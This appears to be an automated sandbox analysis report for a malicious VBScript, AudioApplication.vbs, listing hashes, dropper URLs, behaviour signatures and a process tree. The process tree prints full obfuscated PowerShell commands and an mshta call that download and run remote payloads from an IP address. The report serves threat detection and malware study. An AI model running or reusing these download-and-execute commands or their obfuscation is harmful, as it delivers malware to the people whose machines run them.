AudioApplication.vbs

General
Target

AudioApplication.vbs

Filesize

3KB

Completed

19-01-2022 07:09

Score
10/10
MD5

257cb7d47ef7b5221bd8d95cbdd7f47e

SHA1

0f4cb975fbaf27684908503de9476a2d02646734

SHA256

b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9

Malware Config

Extracted

Language hta
Source
URLs
hta.dropper

http://185.7.214.7/BITRA/oo.html

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/BITRA/AU.PNG

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/BITRA/YES.PNG

Signatures 4

Filter: none

Discovery
  • Blocklisted process makes network request
    mshta.exe

    Reported IOCs

    flowpidprocess
    112464mshta.exe
  • Checks computer location settings
    WScript.exemshta.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\NationWScript.exe
    Key value queried\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nationmshta.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Suspicious use of WriteProcessMemory
    WScript.exemshta.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 2068 wrote to memory of 24642068WScript.exemshta.exe
    PID 2068 wrote to memory of 24642068WScript.exemshta.exe
    PID 2464 wrote to memory of 14162464mshta.exepowershell.exe
    PID 2464 wrote to memory of 14162464mshta.exepowershell.exe
    PID 2464 wrote to memory of 18682464mshta.exepowershell.exe
    PID 2464 wrote to memory of 18682464mshta.exepowershell.exe
Processes 5
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html
      Blocklisted process makes network request
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        PID:1416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        PID:1868
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 408 -p 2464 -ip 2464
    PID:2900
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads